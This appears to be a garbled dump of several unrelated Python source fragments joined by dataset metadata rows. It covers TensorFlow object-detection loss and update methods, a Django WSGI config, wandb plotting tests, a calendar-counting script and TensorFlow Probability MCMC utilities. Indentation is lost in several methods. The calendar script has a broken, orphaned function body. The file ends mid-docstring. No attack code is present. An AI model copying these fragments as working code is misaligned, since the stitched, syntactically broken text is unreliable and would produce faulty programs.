            batch_cropped_gt_mask,
            weights=tf.expand_dims(mask_losses_weights, axis=-1),
            losses_mask=losses_mask)
        total_mask_loss = tf.reduce_sum(mask_losses)
        # NOTE(review): `normalizer` is re-purposed here as the total weighted
        # pixel count for the mask loss, shadowing the proposal-count
        # normalizer defined above.
        normalizer = tf.maximum(
            tf.reduce_sum(mask_losses_weights * mask_height * mask_width), 1.0)
        second_stage_mask_loss = total_mask_loss / normalizer
      if second_stage_mask_loss is not None:
        mask_loss = tf.multiply(self._second_stage_mask_loss_weight,
                                second_stage_mask_loss, name='mask_loss')
        loss_dict[mask_loss.op.name] = mask_loss
    return loss_dict
  def _get_mask_proposal_boxes_and_classes(
      self, detection_boxes, num_detections, image_shape, groundtruth_boxlists,
      groundtruth_classes_with_background_list, groundtruth_weights_list):
    """Returns proposal boxes and class targets to compute evaluation mask loss.
    During evaluation, detection boxes are used to extract features for mask
    prediction. Therefore, to compute mask loss during evaluation detection
    boxes must be used to compute correct class and mask targets. This function
    returns boxes and classes in the correct format for computing mask targets
    during evaluation.
    Args:
      detection_boxes: A 3-D float tensor of shape [batch, max_detection_boxes,
        4] containing detection boxes in normalized co-ordinates.
      num_detections: A 1-D float tensor of shape [batch] containing number of
        valid boxes in `detection_boxes`.
      image_shape: A 1-D tensor of shape [4] containing image tensor shape.
      groundtruth_boxlists: A list of groundtruth boxlists.
      groundtruth_classes_with_background_list: A list of groundtruth classes.
      groundtruth_weights_list: A list of groundtruth weights.
    Return:
      mask_proposal_boxes: detection boxes to use for mask proposals in absolute
        co-ordinates.
      mask_proposal_boxlists: `mask_proposal_boxes` in a list of BoxLists in
        absolute co-ordinates.
      mask_proposal_paddings_indicator: a tensor indicating valid boxes.
      mask_proposal_one_hot_flat_cls_targets_with_background: Class targets
        computed using detection boxes.
    """
    batch, max_num_detections, _ = detection_boxes.shape.as_list()
    # Convert normalized detection boxes into absolute image co-ordinates.
    proposal_boxes = tf.reshape(box_list_ops.to_absolute_coordinates(
        box_list.BoxList(tf.reshape(detection_boxes, [-1, 4])), image_shape[1],
        image_shape[2]).get(), [batch, max_num_detections, 4])
    proposal_boxlists = [
        box_list.BoxList(detection_boxes_single_image)
        for detection_boxes_single_image in tf.unstack(proposal_boxes)
    ]
    paddings_indicator = self._padded_batched_proposals_indicator(
        tf.cast(num_detections, dtype=tf.int32), detection_boxes.shape[1])
    # Re-run target assignment against the detection boxes so class targets
    # line up with the boxes actually used for mask feature extraction.
    (batch_cls_targets_with_background, _, _, _,
     _) = target_assigner.batch_assign_targets(
         target_assigner=self._detector_target_assigner,
         anchors_batch=proposal_boxlists,
         gt_box_batch=groundtruth_boxlists,
         gt_class_targets_batch=groundtruth_classes_with_background_list,
         unmatched_class_label=tf.constant(
             [1] + self._num_classes * [0], dtype=tf.float32),
         gt_weights_batch=groundtruth_weights_list)
    # Collapse (possibly k-hot) targets to one class per box, then re-one-hot.
    flat_cls_targets_with_background = tf.reshape(
        batch_cls_targets_with_background, [-1, self._num_classes + 1])
    one_hot_flat_cls_targets_with_background = tf.argmax(
        flat_cls_targets_with_background, axis=1)
    one_hot_flat_cls_targets_with_background = tf.one_hot(
        one_hot_flat_cls_targets_with_background,
        flat_cls_targets_with_background.get_shape()[1])
    return (proposal_boxes, proposal_boxlists, paddings_indicator,
            one_hot_flat_cls_targets_with_background)
def _get_refined_encodings_for_postitive_class(
self, refined_box_encodings, flat_cls_targets_with_background,
batch_size):
# We only predict refined location encodings for the non background
# classes, but we now pad it to make it compatible with the class
# predictions
refined_box_encodings_with_background = tf.pad(refined_box_encodings,
[[0, 0], [1, 0], [0, 0]])
refined_box_encodings_masked_by_class_targets = (
box_list_ops.boolean_mask(
box_list.BoxList(
tf.reshape(refined_box_encodings_with_background,
[-1, self._box_coder.code_size])),
tf.reshape(tf.greater(flat_cls_targets_with_background, 0), [-1]),
use_static_shapes=self._use_static_shapes,
indicator_sum=batch_size * self.max_num_proposals
if self._use_static_shapes else None).get())
return tf.reshape(
refined_box_encodings_masked_by_class_targets, [
batch_size, self.max_num_proposals,
self._box_coder.code_size
])
def _padded_batched_proposals_indicator(self,
num_proposals,
max_num_proposals):
"""Creates indicator matrix of non-pad elements of padded batch proposals.
Args:
num_proposals: Tensor of type tf.int32 with shape [batch_size].
max_num_proposals: Maximum number of proposals per image (integer).
Returns:
A Tensor of type tf.bool with shape [batch_size, max_num_proposals].
"""
batch_size = tf.size(num_proposals)
tiled_num_proposals = tf.tile(
tf.expand_dims(num_proposals, 1), [1, max_num_proposals])
tiled_proposal_index = tf.tile(
tf.expand_dims(tf.range(max_num_proposals), 0), [batch_size, 1])
return tf.greater(tiled_num_proposals, tiled_proposal_index)
  def _unpad_proposals_and_apply_hard_mining(self,
                                             proposal_boxlists,
                                             second_stage_loc_losses,
                                             second_stage_cls_losses,
                                             num_proposals):
    """Unpads proposals and applies hard mining.
    Args:
      proposal_boxlists: A list of `batch_size` BoxLists each representing
        `self.max_num_proposals` representing decoded proposal bounding boxes
        for each image.
      second_stage_loc_losses: A Tensor of type `float32`. A tensor of shape
        `[batch_size, self.max_num_proposals]` representing per-anchor
        second stage localization loss values.
      second_stage_cls_losses: A Tensor of type `float32`. A tensor of shape
        `[batch_size, self.max_num_proposals]` representing per-anchor
        second stage classification loss values.
      num_proposals: A Tensor of type `int32`. A 1-D tensor of shape [batch]
        representing the number of proposals predicted for each image in
        the batch.
    Returns:
      second_stage_loc_loss: A scalar float32 tensor representing the second
        stage localization loss.
      second_stage_cls_loss: A scalar float32 tensor representing the second
        stage classification loss.
    """
    # NOTE(review): the `return` below executes on the first loop iteration,
    # so hard example mining effectively only processes the first image and
    # assumes batch_size == 1.
    for (proposal_boxlist, single_image_loc_loss, single_image_cls_loss,
         single_image_num_proposals) in zip(
             proposal_boxlists,
             tf.unstack(second_stage_loc_losses),
             tf.unstack(second_stage_cls_losses),
             tf.unstack(num_proposals)):
      # Slice off the zero-padded tail so only real proposals are mined.
      proposal_boxlist = box_list.BoxList(
          tf.slice(proposal_boxlist.get(),
                   [0, 0], [single_image_num_proposals, -1]))
      single_image_loc_loss = tf.slice(single_image_loc_loss,
                                       [0], [single_image_num_proposals])
      single_image_cls_loss = tf.slice(single_image_cls_loss,
                                       [0], [single_image_num_proposals])
      return self._hard_example_miner(
          location_losses=tf.expand_dims(single_image_loc_loss, 0),
          cls_losses=tf.expand_dims(single_image_cls_loss, 0),
          decoded_boxlist_list=[proposal_boxlist])
def regularization_losses(self):
"""Returns a list of regularization losses for this model.
Returns a list of regularization losses for this model that the estimator
needs to use during training/optimization.
Returns:
A list of regularization loss tensors.
"""
all_losses = []
slim_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
# Copy the slim losses to avoid modifying the collection
if slim_losses:
all_losses.extend(slim_losses)
# TODO(kaftan): Possibly raise an error if the feature extractors are
# uninitialized in Keras.
if self._feature_extractor_for_proposal_features:
if (self._feature_extractor_for_proposal_features !=
_UNINITIALIZED_FEATURE_EXTRACTOR):
all_losses.extend(self._feature_extractor_for_proposal_features.losses)
if isinstance(self._first_stage_box_predictor_first_conv,
tf.keras.Model):
all_losses.extend(
self._first_stage_box_predictor_first_conv.losses)
if self._first_stage_box_predictor.is_keras_model:
all_losses.extend(self._first_stage_box_predictor.losses)
if self._feature_extractor_for_box_classifier_features:
if (self._feature_extractor_for_box_classifier_features !=
_UNINITIALIZED_FEATURE_EXTRACTOR):
all_losses.extend(
self._feature_extractor_for_box_classifier_features.losses)
if self._mask_rcnn_box_predictor:
if self._mask_rcnn_box_predictor.is_keras_model:
all_losses.extend(self._mask_rcnn_box_predictor.losses)
return all_losses
def restore_map(self,
fine_tune_checkpoint_type='detection',
load_all_detection_checkpoint_vars=False):
"""Returns a map of variables to load from a foreign checkpoint.
See parent class for details.
Args:
fine_tune_checkpoint_type: whether to restore from a full detection
checkpoint (with compatible variable names) or to restore from a
classification checkpoint for initialization prior to training.
Valid values: `detection`, `classification`. Default 'detection'.
load_all_detection_checkpoint_vars: whether to load all variables (when
`fine_tune_checkpoint_type` is `detection`). If False, only variables
within the feature extractor scopes are included. Default False.
Returns:
A dict mapping variable names (to load from a checkpoint) to variables in
the model graph.
Raises:
ValueError: if fine_tune_checkpoint_type is neither `classification`
nor `detection`.
"""
if fine_tune_checkpoint_type not in ['detection', 'classification']:
raise ValueError('Not supported fine_tune_checkpoint_type: {}'.format(
fine_tune_checkpoint_type))
if fine_tune_checkpoint_type == 'classification':
return self._feature_extractor.restore_from_classification_checkpoint_fn(
self.first_stage_feature_extractor_scope,
self.second_stage_feature_extractor_scope)
variables_to_restore = variables_helper.get_global_variables_safely()
variables_to_restore.append(slim.get_or_create_global_step())
# Only load feature extractor variables to be consistent with loading from
# a classification checkpoint.
include_patterns = None
if not load_all_detection_checkpoint_vars:
include_patterns = [
self.first_stage_feature_extractor_scope,
self.second_stage_feature_extractor_scope
]
feature_extractor_variables = contrib_framework.filter_variables(
variables_to_restore, include_patterns=include_patterns)
return {var.op.name: var for var in feature_extractor_variables}
  def updates(self):
    """Returns a list of update operators for this model.
    Returns a list of update operators for this model that must be executed at
    each training step. The estimator's train op needs to have a control
    dependency on these updates.
    Returns:
      A list of update operators.
    """
    update_ops = []
    slim_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
    # Copy the slim ops to avoid modifying the collection
    if slim_update_ops:
      update_ops.extend(slim_update_ops)
    # Passing None to get_updates_for grabs updates that should always be
    # executed and don't depend on any model inputs in the graph.
    # (E.g. if there was some count that should be incremented every time a
    # model is run).
    #
    # Passing inputs grabs updates that are transitively computed from the
    # model inputs being passed in.
    # (E.g. a batchnorm update depends on the observed inputs)
    # The same None-then-inputs pattern repeats for each Keras sub-model below.
    if self._feature_extractor_for_proposal_features:
      if (self._feature_extractor_for_proposal_features !=
          _UNINITIALIZED_FEATURE_EXTRACTOR):
        update_ops.extend(
            self._feature_extractor_for_proposal_features.get_updates_for(None))
        update_ops.extend(
            self._feature_extractor_for_proposal_features.get_updates_for(
                self._feature_extractor_for_proposal_features.inputs))
    if isinstance(self._first_stage_box_predictor_first_conv,
                  tf.keras.Model):
      update_ops.extend(
          self._first_stage_box_predictor_first_conv.get_updates_for(
              None))
      update_ops.extend(
          self._first_stage_box_predictor_first_conv.get_updates_for(
              self._first_stage_box_predictor_first_conv.inputs))
    if self._first_stage_box_predictor.is_keras_model:
      update_ops.extend(
          self._first_stage_box_predictor.get_updates_for(None))
      update_ops.extend(
          self._first_stage_box_predictor.get_updates_for(
              self._first_stage_box_predictor.inputs))
    if self._feature_extractor_for_box_classifier_features:
      if (self._feature_extractor_for_box_classifier_features !=
          _UNINITIALIZED_FEATURE_EXTRACTOR):
        update_ops.extend(
            self._feature_extractor_for_box_classifier_features.get_updates_for(
                None))
        update_ops.extend(
            self._feature_extractor_for_box_classifier_features.get_updates_for(
                self._feature_extractor_for_box_classifier_features.inputs))
    if self._mask_rcnn_box_predictor:
      if self._mask_rcnn_box_predictor.is_keras_model:
        update_ops.extend(
            self._mask_rcnn_box_predictor.get_updates_for(None))
        update_ops.extend(
            self._mask_rcnn_box_predictor.get_updates_for(
                self._mask_rcnn_box_predictor.inputs))
    return update_ops
| 48.593387 | 80 | 0.710252 |
7df164673d3f1a0beb5c58712212dc28712f9f13 | 383 | py | Python | SMS/wsgi.py | judeakinwale/SMS-backup | 30636591b43bec94e7406f4c02fde402a5a2e38f | [
"MIT"
] | null | null | null | SMS/wsgi.py | judeakinwale/SMS-backup | 30636591b43bec94e7406f4c02fde402a5a2e38f | [
"MIT"
] | null | null | null | SMS/wsgi.py | judeakinwale/SMS-backup | 30636591b43bec94e7406f4c02fde402a5a2e38f | [
"MIT"
] | null | null | null | """
WSGI config for SMS project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at this project's settings module before the app is created.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'SMS.settings')
# Module-level WSGI callable that servers (e.g. gunicorn, mod_wsgi) look up.
application = get_wsgi_application()
| 22.529412 | 78 | 0.780679 |
2696d82b55f444ee687c952a20b43ecb250e77b4 | 1,345 | py | Python | tests/test_plots.py | louiskirsch/wandb | 09ac34824180399a21e6d55ee18c80f5bdf93373 | [
"Apache-2.0"
] | 1 | 2020-08-20T14:02:47.000Z | 2020-08-20T14:02:47.000Z | tests/test_plots.py | louiskirsch/wandb | 09ac34824180399a21e6d55ee18c80f5bdf93373 | [
"Apache-2.0"
] | null | null | null | tests/test_plots.py | louiskirsch/wandb | 09ac34824180399a21e6d55ee18c80f5bdf93373 | [
"Apache-2.0"
] | null | null | null | import pytest
from sklearn.naive_bayes import MultinomialNB
import wandb
from wandb.plots.roc import roc
from wandb.sklearn import learning_curve
from wandb.plots.precision_recall import precision_recall
from wandb.plots.heatmap import heatmap
@pytest.fixture
def dummy_classifier(request):
nb = MultinomialNB()
x_train = [[1,2],[1,2],[1,2],[1,2],[2,3],[3,4],[3,4],[3,4],[3,4],[3,4],[3,4]]
y_train = [0,0,0,0,0,1,1,1,1,1,1]
nb.fit(x_train, y_train)
x_test = [[4,5], [5,6]]
y_test = [0,1]
y_probas = nb.predict_proba(x_test)
y_pred = nb.predict(x_test)
return (nb, x_train, y_train, x_test, y_test, y_pred, y_probas)
def test_roc(dummy_classifier):
    """roc() should produce a table whose first row is [0, 0.0, 0.0]."""
    (nb, x_train, y_train, x_test, y_test, y_pred, y_probas) = dummy_classifier
    # Removed an unrelated, unused `learning_curve(...)` call that was left
    # over here; learning-curve behavior belongs in its own test.
    r = roc(y_test, y_probas)
    # First data row — presumably [class_label, fpr, tpr]; confirm against
    # wandb.plots.roc.
    assert r.value.data[0] == [0, 0.0, 0.0]
def test_precision_recall(dummy_classifier):
    """precision_recall() should report [0, 1.0, 1.0] as its first data row."""
    (nb, x_train, y_train, x_test, y_test, y_pred, y_probas) = dummy_classifier
    chart = precision_recall(y_test, y_probas)
    assert chart.value.data[0] == [0, 1.0, 1.0]
def test_heatmap():
    """heatmap() should lay matrix cells out as [x_label, y_label, value] rows."""
    cell_values = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10]]
    column_labels = ['a', 'b']
    row_labels = ['A', 'B', 'C', 'D', 'E']
    chart = heatmap(column_labels, row_labels, cell_values)
    # Row-major flattening: index 4 is column 'a' of row 'E' (value 9).
    assert chart.value.data[4] == ['a', 'E', 9]
| 32.804878 | 81 | 0.657993 |
70d9440325d7daf95649e1d34464028467326c0e | 1,509 | py | Python | euler/0/19.py | PandaDrunkard/proex | c303f051721d9f271d8187957a4458dc5f4558b1 | [
"MIT"
] | null | null | null | euler/0/19.py | PandaDrunkard/proex | c303f051721d9f271d8187957a4458dc5f4558b1 | [
"MIT"
] | null | null | null | euler/0/19.py | PandaDrunkard/proex | c303f051721d9f271d8187957a4458dc5f4558b1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
days_of_month = {
1: 31,
2: 28,
3: 31,
4: 30,
5: 31,
6: 30,
7: 31,
8: 31,
9: 30,
10: 31,
11: 30,
12: 31,
}
def calculate():
c = 0
for d in iterate_days():
if d["year"] < 1901:
continue
if d["year"] > 2000:
break
if d["day"] == 1 and d["day_of_week"] == 0:
c += 1
return c
def iterate_days():
d = {"year":1900,"month":1,"day":1,"day_of_week":1}
while True:
if d["day"] == 1:
print(d)
yield d
d = get_next_day(d)
def get_next_day(c):
last_day = get_last_day(c["year"],c["month"])
if c["day"] < last_day:
# in mid of month
c["day"] += 1
else:
# in end of month
if c["month"] == 12:
# 12/31
c["year"] += 1
c["month"] = 1
c["day"] = 1
else:
c["month"] += 1
c["day"] = 1
c["day_of_week"] = get_next_day_of_week(c["day_of_week"])
return c
def get_last_day(year, month):
    """Return the number of days in `month` of `year` (Gregorian calendar).

    Uses the standard library instead of hand-rolling the leap-year rule
    (divisible by 4, except centuries, except multiples of 400) and the
    per-month day table.
    """
    import calendar
    # monthrange() returns (weekday_of_first_day, number_of_days_in_month).
    return calendar.monthrange(year, month)[1]
if c > 5:
return 0
else:
return c+1
print(calculate())
| 19.855263 | 61 | 0.444003 |
85c06b3e99b17d8e5deebf4663f207455364c1db | 28,215 | py | Python | tensorflow_probability/python/mcmc/internal/util.py | simeoncarstens/probability | 054a720ff9f221dd9660acd7ce7fb38a1dbb1290 | [
"Apache-2.0"
] | null | null | null | tensorflow_probability/python/mcmc/internal/util.py | simeoncarstens/probability | 054a720ff9f221dd9660acd7ce7fb38a1dbb1290 | [
"Apache-2.0"
] | 2 | 2021-08-25T16:14:51.000Z | 2022-02-10T04:47:11.000Z | tensorflow_probability/python/mcmc/internal/util.py | michalbrys/probability | 054a720ff9f221dd9660acd7ce7fb38a1dbb1290 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Internal utility functions for implementing TransitionKernels."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import warnings
# Dependency imports
import numpy as np
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.internal import distribution_util as dist_util
from tensorflow_probability.python.internal import dtype_util
from tensorflow_probability.python.internal import prefer_static
from tensorflow_probability.python.internal import tensorshape_util
from tensorflow_probability.python.math.gradient import value_and_gradient as tfp_math_value_and_gradients
from tensorflow.python.ops import control_flow_util # pylint: disable=g-direct-tensorflow-import
from tensorflow.python.util import deprecation # pylint: disable=g-direct-tensorflow-import
__all__ = [
'choose',
'enable_store_parameters_in_results',
'left_justified_expand_dims_like',
'left_justified_expand_dims_to',
'left_justified_broadcast_like',
'left_justified_broadcast_to',
'index_remapping_gather',
'is_list_like',
'is_namedtuple_like',
'make_innermost_getter',
'make_innermost_setter',
'make_name',
'maybe_call_fn_and_grads',
'prepare_state_parts',
'PrettyNamedTupleMixin',
'safe_sum',
'SEED_CTOR_ARG_DEPRECATION_MSG',
'set_doc',
'smart_for_loop',
'strip_seeds',
'trace_scan',
'warn_if_parameters_are_not_simple_tensors',
]
SEED_CTOR_ARG_DEPRECATION_MSG = (
'Seeding `tfp.mcmc.TransitionKernel` instances by constructor argument is '
'deprecated. Use the `seed` argument to `tfp.mcmc.sample_chain` or '
'directly on `one_step`. The legacy behavior is still supported and should '
'be through 2020-09-20.')
class PrettyNamedTupleMixin(object):
  """Mixin adding a nicer `__repr__` for `namedtuple`s."""
  # Mixins must not introduce per-instance state, so __slots__ stays empty.
  __slots__ = ()
  def __repr__(self):
    # Renders as "TypeName(\n field=value,\n ...\n)"; newlines inside each
    # value's repr are re-indented so nested output stays aligned.
    return '{}(\n{}\n)'.format(
        type(self).__name__,
        ',\n'.join(' {}={}'.format(k, repr(v).replace('\n', '\n '))
                   for (k, v) in self._asdict().items()))
def left_justified_expand_dims_like(x, reference, name=None):
  """Right pads `x` with `rank(reference) - rank(x)` ones."""
  with tf.name_scope(name or 'left_justified_expand_dims_like'):
    reference_rank = prefer_static.rank(reference)
    return left_justified_expand_dims_to(x, reference_rank)
def left_justified_expand_dims_to(x, rank, name=None):
  """Right pads `x` with `rank - rank(x)` ones."""
  with tf.name_scope(name or 'left_justified_expand_dims_to'):
    target_rank = tf.convert_to_tensor(rank, dtype=tf.int32)
    # Number of trailing singleton dims needed (clamped to be non-negative).
    num_new_dims = prefer_static.maximum(
        target_rank - prefer_static.rank(x), 0)
    trailing_ones = prefer_static.ones(shape=[num_new_dims], dtype=tf.int32)
    new_shape = prefer_static.concat(
        [prefer_static.shape(x), trailing_ones], axis=0)
    return prefer_static.reshape(x, new_shape)
def left_justified_broadcast_like(x, reference, name=None):
  """Broadcasts `x` to shape of reference, in a left-justified manner."""
  with tf.name_scope(name or 'left_justified_broadcast_like'):
    reference_shape = prefer_static.shape(reference)
    return left_justified_broadcast_to(x, reference_shape)
def left_justified_broadcast_to(x, shape, name=None):
  """Broadcasts `x` to shape, in a left-justified manner."""
  with tf.name_scope(name or 'left_justified_broadcast_to'):
    # Right-pad `x` with size-1 dims up to the target rank first, then let
    # ordinary (right-aligned) broadcasting fill the padded dims out.
    target_rank = prefer_static.size(shape)
    padded = left_justified_expand_dims_to(x, target_rank)
    return tf.broadcast_to(padded, shape)
def prepare_state_parts(state_or_state_part, dtype=None, name=None):
  """Calls c2t on each element or the entirety if not iterable; returns list."""
  # Don't use tf.name_scope since this function has ct2-like semantics.
  is_multipart = is_list_like(state_or_state_part)
  if is_multipart:
    raw_parts = state_or_state_part
  else:
    raw_parts = [state_or_state_part]
  state_parts = []
  for part in raw_parts:
    state_parts.append(tf.convert_to_tensor(part, dtype=dtype, name=name))
  return state_parts, is_multipart
def is_list_like(x):
  """Helper which returns `True` if input is `list`-like."""
  # Only the two builtin sequence containers count as "multipart";
  # strings, dicts, and ndarrays deliberately do not.
  return isinstance(x, tuple) or isinstance(x, list)
def is_namedtuple_like(x):
  """Helper which returns `True` if input is `collections.namedtuple`-like."""
  # Duck-typed: a namedtuple exposes `_fields` plus a readable attribute
  # for every field name. Anything missing one of these is not
  # namedtuple-like.
  try:
    field_names = x._fields
  except AttributeError:
    return False
  for field_name in field_names:
    try:
      getattr(x, field_name)
    except AttributeError:
      return False
  return True
def make_name(super_name, default_super_name, sub_name):
  """Helper which makes a `str` name; useful for tf.name_scope."""
  # Fall back to the default when no explicit super name was given.
  if super_name is not None:
    base = super_name
  else:
    base = default_super_name
  if sub_name is None:
    return base
  return base + '_' + sub_name
def _choose_base_case(is_accepted,
                      proposed,
                      current,
                      name=None):
  """Helper to `choose` which expand_dims `is_accepted` and applies tf.where.

  Args:
    is_accepted: Boolean `Tensor`; `True` entries select from `proposed`,
      `False` entries select from `current` (broadcast left-justified
      against each value).
    proposed: `Tensor`, or list of `Tensor`s/namedtuples, of candidates.
    current: Structure matching `proposed` holding the incumbent values.
    name: Python `str` name for the op scope. Default: 'choose'.

  Returns:
    Structure matching `proposed`, with accepted entries taken from
    `proposed` and the rest from `current`.
  """
  def _where(proposed, current):
    """Wraps `tf.where`."""
    # Same object on both sides: selection is a no-op, skip building ops.
    if proposed is current:
      return proposed
    # Preserve the name from `current` so names can propagate from
    # `bootstrap_results`.
    name = getattr(current, 'name', None)
    if name is not None:
      # Strip the scope prefix and the ':0'-style output suffix.
      name = name.rpartition('/')[2].rsplit(':', 1)[0]
    # Since this is an internal utility it is ok to assume
    # tf.shape(proposed) == tf.shape(current).
    return tf.where(left_justified_expand_dims_like(is_accepted, proposed),
                    proposed, current, name=name)
  with tf.name_scope(name or 'choose'):
    if not is_list_like(proposed):
      return _where(proposed, current)
    # Lists may mix plain tensors and namedtuples; recurse into the latter
    # via `choose` so nested results are handled field-by-field.
    return [(choose(is_accepted, p, c, name=name) if is_namedtuple_like(p)
             else _where(p, c))
            for p, c in zip(proposed, current)]
def choose(is_accepted, proposed, current, name=None):
  """Helper which expand_dims `is_accepted` then applies tf.where.

  Recurses through namedtuple structures field-by-field; non-namedtuple
  values fall through to `_choose_base_case`.

  Args:
    is_accepted: Boolean `Tensor`; `True` entries select from `proposed`,
      `False` entries select from `current`.
    proposed: `Tensor`, list, or namedtuple of candidate values.
    current: Value of the same type/structure as `proposed`.
    name: Python `str` name for the op scope. Default: 'choose'.

  Returns:
    Structure of the same type as `proposed` with the selected entries.

  Raises:
    TypeError: If `proposed` and `current` are namedtuples of different
      types.
  """
  with tf.name_scope(name or 'choose'):
    if not is_namedtuple_like(proposed):
      return _choose_base_case(is_accepted, proposed, current, name=name)
    if not isinstance(proposed, type(current)):
      raise TypeError('Type of `proposed` ({}) must be identical to '
                      'type of `current` ({})'.format(
                          type(proposed).__name__,
                          type(current).__name__))
    # Select each field independently, then rebuild the namedtuple.
    items = {}
    for fn in proposed._fields:
      items[fn] = choose(is_accepted,
                         getattr(proposed, fn),
                         getattr(current, fn),
                         name=name)
    return type(proposed)(**items)
def strip_seeds(obj):
  """Recursively replaces any `seed` field in a namedtuple tree with `[]`."""
  if not is_namedtuple_like(obj):
    return obj
  stripped = {}
  for field_name, field_value in obj._asdict().items():
    if field_name == 'seed':
      stripped[field_name] = []
    else:
      stripped[field_name] = strip_seeds(field_value)
  return type(obj)(**stripped)
def safe_sum(x, alt_value=-np.inf, name=None):
  """Elementwise adds list members, replacing non-finite results with alt_value.
  Typically the `alt_value` is chosen so the `MetropolisHastings`
  `TransitionKernel` always rejects the proposal.
  Args:
    x: Python `list` of `Tensors` to elementwise add.
    alt_value: Python scalar used to replace any elementwise sums which would
      otherwise be non-finite.
    name: Python `str` name prefixed to Ops created by this function.
      Default value: `None` (i.e., "safe_sum").
  Returns:
    safe_sum: `Tensor` representing the elementwise sum of list of `Tensor`s
      `x` or `alt_value` where sums are non-finite.
  Raises:
    TypeError: if `x` is not list-like.
    ValueError: if `x` is empty.
  """
  with tf.name_scope(name or 'safe_sum'):
    if not is_list_like(x):
      raise TypeError('Expected list input.')
    if not x:
      raise ValueError('Input should not be empty.')
    # Remember the static shape so it can be re-asserted after the ops
    # below (which may lose it).
    in_shape = x[0].shape
    x = tf.add_n(x)
    # Replace inf/nan sums with `alt_value` so downstream consumers (e.g.
    # acceptance ratios) see a well-defined, typically "reject" value.
    x = tf.where(tf.math.is_finite(x), x, tf.constant(alt_value, dtype=x.dtype))
    tensorshape_util.set_shape(x, in_shape)
    return x
def set_doc(value):
  """Decorator to programmatically set a function docstring."""
  def _apply(func):
    # Mutate the function in place instead of wrapping it, so the
    # decorated object keeps its identity and signature.
    func.__doc__ = value
    return func
  return _apply
def _value_and_gradients(fn, fn_arg_list, result=None, grads=None, name=None):
  """Helper to `maybe_call_fn_and_grads`.

  Computes `fn(*fn_arg_list)` unless `result` is supplied, and the
  gradients of the result with respect to each argument unless `grads`
  is supplied.
  """
  with tf.name_scope(name or 'value_and_gradients'):
    # Like convert_to_tensor, but passes `None` through and maps over lists.
    def _convert_to_tensor(x, name):
      ctt = lambda x_: None if x_ is None else tf.convert_to_tensor(  # pylint: disable=g-long-lambda
          x_, name=name)
      return [ctt(x_) for x_ in x] if is_list_like(x) else ctt(x)
    fn_arg_list = (list(fn_arg_list) if is_list_like(fn_arg_list)
                   else [fn_arg_list])
    fn_arg_list = _convert_to_tensor(fn_arg_list, 'fn_arg')
    if result is None:
      result = fn(*fn_arg_list)
      if grads is None and tf.executing_eagerly():
        # Ensure we disable bijector cacheing in eager mode.
        # TODO(b/72831017): Remove this once bijector cacheing is fixed for
        # eager mode.
        fn_arg_list = [0 + x for x in fn_arg_list]
    result = _convert_to_tensor(result, 'fn_result')
    if grads is not None:
      # Caller already computed gradients; nothing left to do.
      grads = _convert_to_tensor(grads, 'fn_grad')
      return result, grads
    if is_list_like(result) and len(result) == len(fn_arg_list):
      # Compute the block diagonal of Jacobian.
      # TODO(b/79158574): Guard this calculation by an arg which explicitly
      # requests block diagonal Jacobian calculation.
      def fn_slice(i):
        """Needed to prevent `cell-var-from-loop` pylint warning."""
        return lambda x: fn(*(fn_arg_list[:i] + [x] + fn_arg_list[i+1:]))
      grads = [
          tfp_math_value_and_gradients(fn_slice(i), fn_arg_list[i])[1]
          for i in range(len(result))
      ]
    else:
      _, grads = tfp_math_value_and_gradients(fn, fn_arg_list)
    return result, grads
def maybe_call_fn_and_grads(fn,
                            fn_arg_list,
                            result=None,
                            grads=None,
                            check_non_none_grads=True,
                            name=None):
  """Calls `fn` and computes the gradient of the result wrt `args_list`.

  Args:
    fn: Callable mapping the args to a `float`-dtype `Tensor` (or a list of
      them).
    fn_arg_list: `Tensor` or list of `Tensor` arguments.
    result: Previously computed `fn(*fn_arg_list)`, if available, to avoid
      recomputation. Default value: `None`.
    grads: Previously computed gradients, if available.
      Default value: `None`.
    check_non_none_grads: Python `bool`; if `True`, raise when any gradient
      is `None` (e.g., `fn` does not depend on some argument).
    name: Python `str` name prefixed to Ops created by this function.

  Returns:
    result: Value of `fn`.
    grads: List of gradients of `result` with respect to each element of
      `fn_arg_list`.

  Raises:
    TypeError: If `fn`'s result is not `float`-dtype.
    ValueError: If the number of gradients does not match the number of
      args, or a gradient is `None` while `check_non_none_grads` is set.
  """
  with tf.name_scope(name or 'maybe_call_fn_and_grads'):
    fn_arg_list = (list(fn_arg_list) if is_list_like(fn_arg_list)
                   else [fn_arg_list])
    result, grads = _value_and_gradients(fn, fn_arg_list, result, grads)
    if not all(dtype_util.is_floating(r.dtype)
               for r in (result if is_list_like(result) else [result])):  # pylint: disable=superfluous-parens
      raise TypeError('Function result must be a `Tensor` with `float` '
                      '`dtype`.')
    if len(fn_arg_list) != len(grads):
      raise ValueError('Function args must be in one-to-one correspondence '
                       'with grads.')
    if check_non_none_grads and any(g is None for g in grads):
      raise ValueError('Encountered `None` gradient.\n'
                       ' fn_arg_list: {}\n'
                       ' grads: {}'.format(fn_arg_list, grads))
    return result, grads
def smart_for_loop(loop_num_iter, body_fn, initial_loop_vars,
                   parallel_iterations=10, name=None):
  """Construct a for loop, preferring a python loop if `n` is statically known.
  Given `loop_num_iter` and `body_fn`, return an op corresponding to executing
  `body_fn` `loop_num_iter` times, feeding previous outputs of `body_fn` into
  the next iteration.
  If `loop_num_iter` is statically known, the op is constructed via python for
  loop, and otherwise a `tf.while_loop` is used.
  Args:
    loop_num_iter: `Integer` `Tensor` representing the number of loop
      iterations.
